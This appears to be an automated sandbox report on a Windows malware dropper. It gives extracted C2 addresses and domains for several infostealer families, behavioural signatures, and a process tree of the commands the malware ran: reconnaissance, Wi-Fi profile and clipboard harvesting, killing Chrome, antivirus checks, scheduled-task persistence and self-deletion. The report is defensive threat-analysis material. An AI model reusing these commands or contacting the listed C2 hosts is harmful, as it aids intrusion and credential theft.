Analysis

  • max time kernel
    150s
  • max time network
    151s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20240508-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20240508-enlocale:en-usos:windows10-2004-x64system
  • submitted
    25-05-2024 12:15

General

  • Target

    b7d63c950abde3658af58aad59d75e2602df2c5e46f710ab20020ace33d81b9c.exe

  • Size

    1.8MB

  • MD5

    d6db11f9b241bef7caa8e5a4bf0ea787

  • SHA1

    3d56b24b54f1b266bd468f056c6fac187cab16f8

  • SHA256

    b7d63c950abde3658af58aad59d75e2602df2c5e46f710ab20020ace33d81b9c

  • SHA512

    d1b540fc8db9d303a032a5c00e5ea9c4db84e56747dc6b8f3735b3826a0c85807a48e839c420949696604e249a39e1a3d7141dc6d4bf826a2c696b6fec54943c

  • SSDEEP

    49152:W0HYIJ6J5JbftF2JPp/Y+PtNo4xvhyK8ud:WRjXJrkPpZgK5

Malware Config

Extracted

Family

amadey

Version

4.21

Botnet

0e6740

C2

http://147.45.47.155

Attributes
  • install_dir

    9217037dc9

  • install_file

    explortu.exe

  • strings_key

    8e894a8a4a3d0da8924003a561cfb244

  • url_paths

    /ku4Nor9/index.php

rc4.plain

Extracted

Family

amadey

Version

4.21

Botnet

49e482

C2

http://147.45.47.70

Attributes
  • install_dir

    1b29d73536

  • install_file

    axplont.exe

  • strings_key

    4d31dd1a190d9879c21fac6d87dc0043

  • url_paths

    /tr8nomy/index.php

rc4.plain

Extracted

Family

risepro

C2

147.45.47.126:58709

Extracted

Family

redline

Botnet

1

C2

185.215.113.67:40960

Extracted

Family

stealc

Botnet

zzvv

C2

http://23.88.106.134

Attributes
  • url_path

    /c73eed764cc59dcb.php

Extracted

Family

redline

Botnet

@LOGSCLOUDYT_BOT

C2

185.172.128.33:8970

Extracted

Family

lumma

C2

https://roomabolishsnifftwk.shop/api

https://museumtespaceorsp.shop/api

https://buttockdecarderwiso.shop/api

https://averageaattractiionsl.shop/api

https://femininiespywageg.shop/api

https://employhabragaomlsp.shop/api

https://stalfbaclcalorieeis.shop/api

https://civilianurinedtsraov.shop/api

Signatures

  • Amadey

    Amadey bot is a simple trojan bot primarily used for collecting reconnaissance information.

  • Exela Stealer

    Exela Stealer is an open source stealer originally written in .NET and later transitioned to Python that was first observed in August 2023.

  • Lumma Stealer

    An infostealer written in C++ first seen in August 2022.

  • RedLine

    RedLine Stealer is a malware family written in C#, first appearing in early 2020.

  • RedLine payload 4 IoCs
  • RisePro

    RisePro stealer is an infostealer distributed by PrivateLoader.

  • Stealc

    Stealc is an infostealer written in C++.

  • Grants admin privileges 1 TTPs

    Uses net.exe to modify the user's privileges.

  • Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 9 IoCs
  • Downloads MZ/PE file
  • Modifies Windows Firewall 2 TTPs 2 IoCs
  • Stops running service(s) 4 TTPs
  • Checks BIOS information in registry 2 TTPs 18 IoCs

    BIOS information is often read in order to detect sandboxing environments.

  • Checks computer location settings 2 TTPs 9 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Executes dropped EXE 43 IoCs
  • Identifies Wine through registry keys 2 TTPs 9 IoCs

    Wine is a compatibility layer capable of running Windows applications, which can be used as sandboxing environment.

  • Loads dropped DLL 36 IoCs
  • Reads data files stored by FTP clients 2 TTPs

    Tries to access configuration files associated with programs like FileZilla.

  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
  • Adds Run key to start application 2 TTPs 1 IoCs
  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

  • Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs
  • Looks up external IP address via web service 1 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Suspicious use of NtSetInformationThreadHideFromDebugger 9 IoCs
  • Suspicious use of SetThreadContext 4 IoCs
  • Drops file in Program Files directory 14 IoCs
  • Drops file in Windows directory 2 IoCs
  • Launches sc.exe 6 IoCs

    Sc.exe is a Windows utlilty to control services on the system.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • NSIS installer 2 IoCs
  • Checks processor information in registry 2 TTPs 2 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Collects information from the system 1 TTPs 1 IoCs

    Uses WMIC.exe to find detailed system information.

  • Creates scheduled task(s) 1 TTPs 1 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Enumerates processes with tasklist 1 TTPs 7 IoCs
  • Gathers network information 2 TTPs 2 IoCs

    Uses commandline utility to view network configuration.

  • Gathers system information 1 TTPs 1 IoCs

    Runs systeminfo.exe.

  • Kills process with taskkill 1 IoCs
  • Modifies system certificate store 2 TTPs 2 IoCs
  • Runs net.exe
  • Runs ping.exe 1 TTPs 2 IoCs
  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of FindShellTrayWindow 8 IoCs
  • Suspicious use of SendNotifyMessage 6 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs
  • Views/modifies file attributes 1 TTPs 1 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\b7d63c950abde3658af58aad59d75e2602df2c5e46f710ab20020ace33d81b9c.exe
    "C:\Users\Admin\AppData\Local\Temp\b7d63c950abde3658af58aad59d75e2602df2c5e46f710ab20020ace33d81b9c.exe"
    1⤵
    • Identifies VirtualBox via ACPI registry values (likely anti-VM)
    • Checks BIOS information in registry
    • Checks computer location settings
    • Identifies Wine through registry keys
    • Suspicious use of NtSetInformationThreadHideFromDebugger
    • Drops file in Windows directory
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious use of FindShellTrayWindow
    • Suspicious use of WriteProcessMemory
    PID:1916
    • C:\Users\Admin\AppData\Local\Temp\9217037dc9\explortu.exe
      "C:\Users\Admin\AppData\Local\Temp\9217037dc9\explortu.exe"
      2⤵
      • Identifies VirtualBox via ACPI registry values (likely anti-VM)
      • Checks BIOS information in registry
      • Checks computer location settings
      • Executes dropped EXE
      • Identifies Wine through registry keys
      • Adds Run key to start application
      • Suspicious use of NtSetInformationThreadHideFromDebugger
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of WriteProcessMemory
      PID:1572
      • C:\Users\Admin\AppData\Local\Temp\9217037dc9\explortu.exe
        "C:\Users\Admin\AppData\Local\Temp\9217037dc9\explortu.exe"
        3⤵
          PID:4424
        • C:\Users\Admin\1000004002\2a53e3dbd6.exe
          "C:\Users\Admin\1000004002\2a53e3dbd6.exe"
          3⤵
          • Identifies VirtualBox via ACPI registry values (likely anti-VM)
          • Checks BIOS information in registry
          • Checks computer location settings
          • Executes dropped EXE
          • Identifies Wine through registry keys
          • Suspicious use of NtSetInformationThreadHideFromDebugger
          • Drops file in Windows directory
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of WriteProcessMemory
          PID:2260
          • C:\Users\Admin\AppData\Local\Temp\1b29d73536\axplont.exe
            "C:\Users\Admin\AppData\Local\Temp\1b29d73536\axplont.exe"
            4⤵
            • Identifies VirtualBox via ACPI registry values (likely anti-VM)
            • Checks BIOS information in registry
            • Executes dropped EXE
            • Identifies Wine through registry keys
            • Suspicious use of NtSetInformationThreadHideFromDebugger
            • Suspicious behavior: EnumeratesProcesses
            PID:3212
        • C:\Users\Admin\AppData\Local\Temp\1000005001\3a79da19c4.exe
          "C:\Users\Admin\AppData\Local\Temp\1000005001\3a79da19c4.exe"
          3⤵
          • Identifies VirtualBox via ACPI registry values (likely anti-VM)
          • Checks BIOS information in registry
          • Executes dropped EXE
          • Identifies Wine through registry keys
          • Suspicious use of NtSetInformationThreadHideFromDebugger
          • Suspicious behavior: EnumeratesProcesses
          PID:2576
    • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --no-appcompat-clear --field-trial-handle=3668,i,1067197275908310731,12785105794523264014,262144 --variations-seed-version --mojo-platform-channel-handle=4400 /prefetch:8
      1⤵
        PID:4392
      • C:\Users\Admin\AppData\Local\Temp\1b29d73536\axplont.exe
        C:\Users\Admin\AppData\Local\Temp\1b29d73536\axplont.exe
        1⤵
        • Identifies VirtualBox via ACPI registry values (likely anti-VM)
        • Checks BIOS information in registry
        • Checks computer location settings
        • Executes dropped EXE
        • Identifies Wine through registry keys
        • Suspicious use of NtSetInformationThreadHideFromDebugger
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of WriteProcessMemory
        PID:2040
        • C:\Users\Admin\AppData\Local\Temp\1000002001\buildjudit.exe
          "C:\Users\Admin\AppData\Local\Temp\1000002001\buildjudit.exe"
          2⤵
          • Executes dropped EXE
          • Suspicious use of WriteProcessMemory
          PID:2952
          • C:\Users\Admin\AppData\Local\Temp\onefile_2952_133611129712386591\stub.exe
            "C:\Users\Admin\AppData\Local\Temp\1000002001\buildjudit.exe"
            3⤵
            • Executes dropped EXE
            • Loads dropped DLL
            • Suspicious use of WriteProcessMemory
            PID:1744
            • C:\Windows\system32\cmd.exe
              C:\Windows\system32\cmd.exe /c "ver"
              4⤵
                PID:4440
                • C:\Windows\System32\Conhost.exe
                  \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                  5⤵
                    PID:1864
                • C:\Windows\system32\cmd.exe
                  C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"
                  4⤵
                  • Suspicious use of WriteProcessMemory
                  PID:4592
                  • C:\Windows\System32\Wbem\WMIC.exe
                    wmic csproduct get uuid
                    5⤵
                    • Suspicious use of AdjustPrivilegeToken
                    PID:3592
                • C:\Windows\system32\cmd.exe
                  C:\Windows\system32\cmd.exe /c "tasklist"
                  4⤵
                  • Suspicious use of WriteProcessMemory
                  PID:3684
                  • C:\Windows\system32\tasklist.exe
                    tasklist
                    5⤵
                    • Enumerates processes with tasklist
                    • Suspicious use of AdjustPrivilegeToken
                    PID:956
                • C:\Windows\system32\cmd.exe
                  C:\Windows\system32\cmd.exe /c "attrib +h +s "C:\Users\Admin\AppData\Local\MonsterUpdateService\Monster.exe""
                  4⤵
                  • Suspicious use of WriteProcessMemory
                  PID:4068
                  • C:\Windows\system32\attrib.exe
                    attrib +h +s "C:\Users\Admin\AppData\Local\MonsterUpdateService\Monster.exe"
                    5⤵
                    • Views/modifies file attributes
                    PID:1068
                • C:\Windows\system32\cmd.exe
                  C:\Windows\system32\cmd.exe /c "mshta "javascript:var sh=new ActiveXObject('WScript.Shell'); sh.Popup('%error_message%', 0, 'System Error', 0+16);close()""
                  4⤵
                    PID:3592
                  • C:\Windows\system32\cmd.exe
                    C:\Windows\system32\cmd.exe /c "taskkill /F /IM chrome.exe"
                    4⤵
                    • Suspicious use of WriteProcessMemory
                    PID:4320
                    • C:\Windows\system32\taskkill.exe
                      taskkill /F /IM chrome.exe
                      5⤵
                      • Kills process with taskkill
                      • Suspicious use of AdjustPrivilegeToken
                      PID:1864
                  • C:\Windows\system32\cmd.exe
                    C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
                    4⤵
                    • Suspicious use of WriteProcessMemory
                    PID:4152
                    • C:\Windows\system32\tasklist.exe
                      tasklist /FO LIST
                      5⤵
                      • Enumerates processes with tasklist
                      • Suspicious use of AdjustPrivilegeToken
                      PID:956
                  • C:\Windows\system32\cmd.exe
                    C:\Windows\system32\cmd.exe /c "powershell.exe Get-Clipboard"
                    4⤵
                    • Suspicious use of WriteProcessMemory
                    PID:4344
                    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                      powershell.exe Get-Clipboard
                      5⤵
                      • Suspicious behavior: EnumeratesProcesses
                      • Suspicious use of AdjustPrivilegeToken
                      PID:3468
                  • C:\Windows\system32\cmd.exe
                    C:\Windows\system32\cmd.exe /c "chcp"
                    4⤵
                    • Suspicious use of WriteProcessMemory
                    PID:792
                    • C:\Windows\system32\chcp.com
                      chcp
                      5⤵
                        PID:4268
                    • C:\Windows\system32\cmd.exe
                      C:\Windows\system32\cmd.exe /c "chcp"
                      4⤵
                      • Suspicious use of WriteProcessMemory
                      PID:464
                      • C:\Windows\System32\Conhost.exe
                        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                        5⤵
                          PID:3684
                        • C:\Windows\system32\chcp.com
                          chcp
                          5⤵
                            PID:2664
                        • C:\Windows\system32\cmd.exe
                          C:\Windows\system32\cmd.exe /c "netsh wlan show profiles"
                          4⤵
                          • Suspicious use of WriteProcessMemory
                          PID:5136
                          • C:\Windows\system32\netsh.exe
                            netsh wlan show profiles
                            5⤵
                              PID:5240
                          • C:\Windows\system32\cmd.exe
                            C:\Windows\system32\cmd.exe /c "echo ####System Info#### & systeminfo & echo ####System Version#### & ver & echo ####Host Name#### & hostname & echo ####Environment Variable#### & set & echo ####Logical Disk#### & wmic logicaldisk get caption,description,providername & echo ####User Info#### & net user & echo ####Online User#### & query user & echo ####Local Group#### & net localgroup & echo ####Administrators Info#### & net localgroup administrators & echo ####Guest User Info#### & net user guest & echo ####Administrator User Info#### & net user administrator & echo ####Startup Info#### & wmic startup get caption,command & echo ####Tasklist#### & tasklist /svc & echo ####Ipconfig#### & ipconfig/all & echo ####Hosts#### & type C:\WINDOWS\System32\drivers\etc\hosts & echo ####Route Table#### & route print & echo ####Arp Info#### & arp -a & echo ####Netstat#### & netstat -ano & echo ####Service Info#### & sc query type= service state= all & echo ####Firewallinfo#### & netsh firewall show state & netsh firewall show config"
                            4⤵
                            • Suspicious use of WriteProcessMemory
                            PID:5156
                            • C:\Windows\system32\systeminfo.exe
                              systeminfo
                              5⤵
                              • Gathers system information
                              PID:5328
                            • C:\Windows\system32\HOSTNAME.EXE
                              hostname
                              5⤵
                                PID:5556
                              • C:\Windows\System32\Wbem\WMIC.exe
                                wmic logicaldisk get caption,description,providername
                                5⤵
                                • Collects information from the system
                                • Suspicious use of AdjustPrivilegeToken
                                PID:5572
                              • C:\Windows\system32\net.exe
                                net user
                                5⤵
                                  PID:5612
                                  • C:\Windows\system32\net1.exe
                                    C:\Windows\system32\net1 user
                                    6⤵
                                      PID:5628
                                  • C:\Windows\system32\query.exe
                                    query user
                                    5⤵
                                      PID:5644
                                      • C:\Windows\system32\quser.exe
                                        "C:\Windows\system32\quser.exe"
                                        6⤵
                                          PID:5664
                                      • C:\Windows\system32\net.exe
                                        net localgroup
                                        5⤵
                                          PID:5680
                                          • C:\Windows\system32\net1.exe
                                            C:\Windows\system32\net1 localgroup
                                            6⤵
                                              PID:5696
                                          • C:\Windows\system32\net.exe
                                            net localgroup administrators
                                            5⤵
                                              PID:5712
                                              • C:\Windows\system32\net1.exe
                                                C:\Windows\system32\net1 localgroup administrators
                                                6⤵
                                                  PID:5728
                                              • C:\Windows\system32\net.exe
                                                net user guest
                                                5⤵
                                                  PID:5744
                                                  • C:\Windows\system32\net1.exe
                                                    C:\Windows\system32\net1 user guest
                                                    6⤵
                                                      PID:5760
                                                  • C:\Windows\system32\net.exe
                                                    net user administrator
                                                    5⤵
                                                      PID:5776
                                                      • C:\Windows\system32\net1.exe
                                                        C:\Windows\system32\net1 user administrator
                                                        6⤵
                                                          PID:5792
                                                      • C:\Windows\System32\Wbem\WMIC.exe
                                                        wmic startup get caption,command
                                                        5⤵
                                                          PID:5808
                                                        • C:\Windows\system32\tasklist.exe
                                                          tasklist /svc
                                                          5⤵
                                                          • Enumerates processes with tasklist
                                                          PID:5844
                                                        • C:\Windows\system32\ipconfig.exe
                                                          ipconfig /all
                                                          5⤵
                                                          • Gathers network information
                                                          PID:5876
                                                        • C:\Windows\system32\ROUTE.EXE
                                                          route print
                                                          5⤵
                                                            PID:5904
                                                          • C:\Windows\system32\ARP.EXE
                                                            arp -a
                                                            5⤵
                                                              PID:5924
                                                            • C:\Windows\system32\NETSTAT.EXE
                                                              netstat -ano
                                                              5⤵
                                                              • Gathers network information
                                                              PID:5940
                                                            • C:\Windows\system32\sc.exe
                                                              sc query type= service state= all
                                                              5⤵
                                                              • Launches sc.exe
                                                              PID:5956
                                                            • C:\Windows\system32\netsh.exe
                                                              netsh firewall show state
                                                              5⤵
                                                              • Modifies Windows Firewall
                                                              PID:5972
                                                            • C:\Windows\system32\netsh.exe
                                                              netsh firewall show config
                                                              5⤵
                                                              • Modifies Windows Firewall
                                                              PID:6008
                                                          • C:\Windows\system32\cmd.exe
                                                            C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"
                                                            4⤵
                                                              PID:6068
                                                              • C:\Windows\System32\Wbem\WMIC.exe
                                                                wmic csproduct get uuid
                                                                5⤵
                                                                  PID:6120
                                                              • C:\Windows\system32\cmd.exe
                                                                C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"
                                                                4⤵
                                                                  PID:1536
                                                                  • C:\Windows\System32\Wbem\WMIC.exe
                                                                    wmic csproduct get uuid
                                                                    5⤵
                                                                      PID:1068
                                                              • C:\Users\Admin\AppData\Local\Temp\1000004001\228.exe
                                                                "C:\Users\Admin\AppData\Local\Temp\1000004001\228.exe"
                                                                2⤵
                                                                • Checks computer location settings
                                                                • Executes dropped EXE
                                                                PID:4000
                                                                • C:\Windows\SysWOW64\cmd.exe
                                                                  "C:\Windows\System32\cmd.exe" /k move Descriptions Descriptions.cmd & Descriptions.cmd & exit
                                                                  3⤵
                                                                    PID:2952
                                                                    • C:\Windows\SysWOW64\tasklist.exe
                                                                      tasklist
                                                                      4⤵
                                                                      • Enumerates processes with tasklist
                                                                      PID:5800
                                                                    • C:\Windows\SysWOW64\findstr.exe
                                                                      findstr /I "wrsa.exe opssvc.exe"
                                                                      4⤵
                                                                        PID:5912
                                                                      • C:\Windows\SysWOW64\tasklist.exe
                                                                        tasklist
                                                                        4⤵
                                                                        • Enumerates processes with tasklist
                                                                        PID:5448
                                                                      • C:\Windows\SysWOW64\findstr.exe
                                                                        findstr /I "avastui.exe avgui.exe nswscsvc.exe sophoshealth.exe"
                                                                        4⤵
                                                                          PID:5492
                                                                        • C:\Windows\SysWOW64\cmd.exe
                                                                          cmd /c md 337963
                                                                          4⤵
                                                                            PID:6112
                                                                          • C:\Windows\SysWOW64\findstr.exe
                                                                            findstr /V "EnquiryAnContributionRefers" Tank
                                                                            4⤵
                                                                              PID:5324
                                                                            • C:\Windows\SysWOW64\cmd.exe
                                                                              cmd /c copy /b Ph + Shoot 337963\r
                                                                              4⤵
                                                                                PID:5160
                                                                              • C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCache\337963\Rent.pif
                                                                                337963\Rent.pif 337963\r
                                                                                4⤵
                                                                                • Executes dropped EXE
                                                                                • Suspicious behavior: EnumeratesProcesses
                                                                                • Suspicious use of FindShellTrayWindow
                                                                                • Suspicious use of SendNotifyMessage
                                                                                PID:5132
                                                                              • C:\Windows\SysWOW64\PING.EXE
                                                                                ping -n 5 127.0.0.1
                                                                                4⤵
                                                                                • Runs ping.exe
                                                                                PID:5168
                                                                          • C:\Users\Admin\AppData\Local\Temp\1000005001\fileosn.exe
                                                                            "C:\Users\Admin\AppData\Local\Temp\1000005001\fileosn.exe"
                                                                            2⤵
                                                                            • Executes dropped EXE
                                                                            • Modifies system certificate store
                                                                            • Suspicious behavior: EnumeratesProcesses
                                                                            PID:5244
                                                                          • C:\Users\Admin\AppData\Local\Temp\1000006001\lumma1234.exe
                                                                            "C:\Users\Admin\AppData\Local\Temp\1000006001\lumma1234.exe"
                                                                            2⤵
                                                                            • Executes dropped EXE
                                                                            • Suspicious use of SetThreadContext
                                                                            PID:1248
                                                                            • C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                              "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
                                                                              3⤵
                                                                                PID:336
                                                                            • C:\Users\Admin\AppData\Local\Temp\1000007001\Newoff.exe
                                                                              "C:\Users\Admin\AppData\Local\Temp\1000007001\Newoff.exe"
                                                                              2⤵
                                                                              • Checks computer location settings
                                                                              • Executes dropped EXE
                                                                              PID:5664
                                                                              • C:\Windows\SysWOW64\schtasks.exe
                                                                                "C:\Windows\System32\schtasks.exe" /Create /SC MINUTE /MO 1 /TN Newoff.exe /TR "C:\Users\Admin\AppData\Local\Temp\1000007001\Newoff.exe" /F
                                                                                3⤵
                                                                                • Creates scheduled task(s)
                                                                                PID:1288
                                                                            • C:\Users\Admin\AppData\Local\Temp\1000008001\gold.exe
                                                                              "C:\Users\Admin\AppData\Local\Temp\1000008001\gold.exe"
                                                                              2⤵
                                                                              • Executes dropped EXE
                                                                              • Suspicious use of SetThreadContext
                                                                              PID:5892
                                                                              • C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
                                                                                3⤵
                                                                                  PID:3008
                                                                                • C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                  "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
                                                                                  3⤵
                                                                                    PID:5952
                                                                                • C:\Users\Admin\AppData\Local\Temp\1000009001\swizzzz.exe
                                                                                  "C:\Users\Admin\AppData\Local\Temp\1000009001\swizzzz.exe"
                                                                                  2⤵
                                                                                  • Executes dropped EXE
                                                                                  • Suspicious use of SetThreadContext
                                                                                  PID:6020
                                                                                  • C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                    "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
                                                                                    3⤵
                                                                                    • Loads dropped DLL
                                                                                    • Checks processor information in registry
                                                                                    • Suspicious behavior: EnumeratesProcesses
                                                                                    PID:5248
                                                                                • C:\Users\Admin\AppData\Local\Temp\1000010001\install.exe
                                                                                  "C:\Users\Admin\AppData\Local\Temp\1000010001\install.exe"
                                                                                  2⤵
                                                                                  • Checks computer location settings
                                                                                  • Executes dropped EXE
                                                                                  • Drops file in Program Files directory
                                                                                  PID:820
                                                                                  • C:\Windows\SysWOW64\cmd.exe
                                                                                    C:\Windows\system32\cmd.exe /c ""C:\Program Files (x86)\GameSyncLink\installg.bat" "
                                                                                    3⤵
                                                                                      PID:4628
                                                                                      • C:\Windows\SysWOW64\sc.exe
                                                                                        Sc stop GameServerClient
                                                                                        4⤵
                                                                                        • Launches sc.exe
                                                                                        PID:5808
                                                                                      • C:\Program Files (x86)\GameSyncLink\GameService.exe
                                                                                        GameService remove GameServerClient confirm
                                                                                        4⤵
                                                                                        • Executes dropped EXE
                                                                                        PID:5884
                                                                                      • C:\Windows\SysWOW64\sc.exe
                                                                                        Sc delete GameSyncLink
                                                                                        4⤵
                                                                                        • Launches sc.exe
                                                                                        PID:5916
                                                                                      • C:\Program Files (x86)\GameSyncLink\GameService.exe
                                                                                        GameService remove GameSyncLink confirm
                                                                                        4⤵
                                                                                        • Executes dropped EXE
                                                                                        PID:116
                                                                                      • C:\Program Files (x86)\GameSyncLink\GameService.exe
                                                                                        GameService install GameSyncLink "C:\Program Files (x86)\GameSyncLink\GameSyncLink.exe"
                                                                                        4⤵
                                                                                        • Executes dropped EXE
                                                                                        PID:2360
                                                                                      • C:\Program Files (x86)\GameSyncLink\GameService.exe
                                                                                        GameService start GameSyncLink
                                                                                        4⤵
                                                                                        • Executes dropped EXE
                                                                                        PID:2584
                                                                                    • C:\Windows\SysWOW64\cmd.exe
                                                                                      C:\Windows\system32\cmd.exe /c ""C:\Program Files (x86)\GameSyncLink\installc.bat" "
                                                                                      3⤵
                                                                                        PID:5876
                                                                                        • C:\Windows\SysWOW64\sc.exe
                                                                                          Sc stop GameServerClientC
                                                                                          4⤵
                                                                                          • Launches sc.exe
                                                                                          PID:3480
                                                                                        • C:\Program Files (x86)\GameSyncLink\GameService.exe
                                                                                          GameService remove GameServerClientC confirm
                                                                                          4⤵
                                                                                          • Executes dropped EXE
                                                                                          PID:5976
                                                                                        • C:\Windows\SysWOW64\sc.exe
                                                                                          Sc delete PiercingNetLink
                                                                                          4⤵
                                                                                          • Launches sc.exe
                                                                                          PID:6008
                                                                                        • C:\Program Files (x86)\GameSyncLink\GameService.exe
                                                                                          GameService remove PiercingNetLink confirm
                                                                                          4⤵
                                                                                          • Executes dropped EXE
                                                                                          PID:1600
                                                                                        • C:\Program Files (x86)\GameSyncLink\GameService.exe
                                                                                          GameService install PiercingNetLink "C:\Program Files (x86)\GameSyncLink\PiercingNetLink.exe"
                                                                                          4⤵
                                                                                          • Executes dropped EXE
                                                                                          PID:1608
                                                                                        • C:\Program Files (x86)\GameSyncLink\GameService.exe
                                                                                          GameService start PiercingNetLink
                                                                                          4⤵
                                                                                          • Executes dropped EXE
                                                                                          PID:6132
                                                                                      • C:\Windows\SysWOW64\cmd.exe
                                                                                        C:\Windows\system32\cmd.exe /c ""C:\Program Files (x86)\GameSyncLink\installm.bat" "
                                                                                        3⤵
                                                                                          PID:968
                                                                                          • C:\Windows\SysWOW64\sc.exe
                                                                                            Sc delete GameSyncLinks
                                                                                            4⤵
                                                                                            • Launches sc.exe
                                                                                            PID:4008
                                                                                          • C:\Program Files (x86)\GameSyncLink\GameService.exe
                                                                                            GameService remove GameSyncLinks confirm
                                                                                            4⤵
                                                                                            • Executes dropped EXE
                                                                                            PID:2596
                                                                                          • C:\Program Files (x86)\GameSyncLink\GameService.exe
                                                                                            GameService install GameSyncLinks "C:\Program Files (x86)\GameSyncLink\GameSyncLinks.exe"
                                                                                            4⤵
                                                                                            • Executes dropped EXE
                                                                                            PID:4468
                                                                                          • C:\Program Files (x86)\GameSyncLink\GameService.exe
                                                                                            GameService start GameSyncLinks
                                                                                            4⤵
                                                                                            • Executes dropped EXE
                                                                                            PID:1384
                                                                                        • C:\Windows\SysWOW64\cmd.exe
                                                                                          C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\7ZSfx000.cmd" "
                                                                                          3⤵
                                                                                            PID:1996
                                                                                        • C:\Users\Admin\AppData\Local\Temp\1000011001\alex.exe
                                                                                          "C:\Users\Admin\AppData\Local\Temp\1000011001\alex.exe"
                                                                                          2⤵
                                                                                          • Executes dropped EXE
                                                                                          • Suspicious use of SetThreadContext
                                                                                          PID:3096
                                                                                          • C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                            "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
                                                                                            3⤵
                                                                                            • Checks computer location settings
                                                                                            PID:5604
                                                                                            • C:\Users\Admin\AppData\Roaming\configurationValue\svhoost.exe
                                                                                              "C:\Users\Admin\AppData\Roaming\configurationValue\svhoost.exe"
                                                                                              4⤵
                                                                                              • Executes dropped EXE
                                                                                              • Suspicious behavior: EnumeratesProcesses
                                                                                              PID:4012
                                                                                            • C:\Users\Admin\AppData\Roaming\configurationValue\One.exe
                                                                                              "C:\Users\Admin\AppData\Roaming\configurationValue\One.exe"
                                                                                              4⤵
                                                                                              • Executes dropped EXE
                                                                                              • Suspicious behavior: EnumeratesProcesses
                                                                                              PID:3336
                                                                                            • C:\Windows\SysWOW64\cmd.exe
                                                                                              "C:\Windows\System32\cmd.exe" /C choice /C Y /N /D Y /T 3 & Del "RegAsm.exe"
                                                                                              4⤵
                                                                                                PID:5300
                                                                                                • C:\Windows\SysWOW64\choice.exe
                                                                                                  choice /C Y /N /D Y /T 3
                                                                                                  5⤵
                                                                                                    PID:5916
                                                                                            • C:\Users\Admin\AppData\Local\Temp\1000013001\4.exe
                                                                                              "C:\Users\Admin\AppData\Local\Temp\1000013001\4.exe"
                                                                                              2⤵
                                                                                              • Checks computer location settings
                                                                                              • Executes dropped EXE
                                                                                              PID:5328
                                                                                              • C:\Windows\SysWOW64\cmd.exe
                                                                                                "C:\Windows\System32\cmd.exe" /k copy Subsequently Subsequently.cmd & Subsequently.cmd & exit
                                                                                                3⤵
                                                                                                  PID:5836
                                                                                                  • C:\Windows\SysWOW64\tasklist.exe
                                                                                                    tasklist
                                                                                                    4⤵
                                                                                                    • Enumerates processes with tasklist
                                                                                                    PID:3216
                                                                                                  • C:\Windows\SysWOW64\findstr.exe
                                                                                                    findstr /I "wrsa.exe opssvc.exe"
                                                                                                    4⤵
                                                                                                      PID:3736
                                                                                                    • C:\Windows\SysWOW64\tasklist.exe
                                                                                                      tasklist
                                                                                                      4⤵
                                                                                                      • Enumerates processes with tasklist
                                                                                                      PID:376
                                                                                                    • C:\Windows\SysWOW64\findstr.exe
                                                                                                      findstr /I "avastui.exe avgui.exe nswscsvc.exe sophoshealth.exe"
                                                                                                      4⤵
                                                                                                        PID:1900
                                                                                                      • C:\Windows\SysWOW64\cmd.exe
                                                                                                        cmd /c md 196475
                                                                                                        4⤵
                                                                                                          PID:4364
                                                                                                        • C:\Windows\SysWOW64\findstr.exe
                                                                                                          findstr /V "MistakeSaStevensStudios" Requesting
                                                                                                          4⤵
                                                                                                            PID:4808
                                                                                                          • C:\Windows\SysWOW64\cmd.exe
                                                                                                            cmd /c copy /b Formed + Veteran 196475\q
                                                                                                            4⤵
                                                                                                              PID:2096
                                                                                                            • C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCache\196475\Helen.pif
                                                                                                              196475\Helen.pif 196475\q
                                                                                                              4⤵
                                                                                                              • Executes dropped EXE
                                                                                                              • Suspicious use of FindShellTrayWindow
                                                                                                              • Suspicious use of SendNotifyMessage
                                                                                                              PID:5236
                                                                                                            • C:\Windows\SysWOW64\PING.EXE
                                                                                                              ping -n 5 127.0.0.1
                                                                                                              4⤵
                                                                                                              • Runs ping.exe
                                                                                                              PID:5644
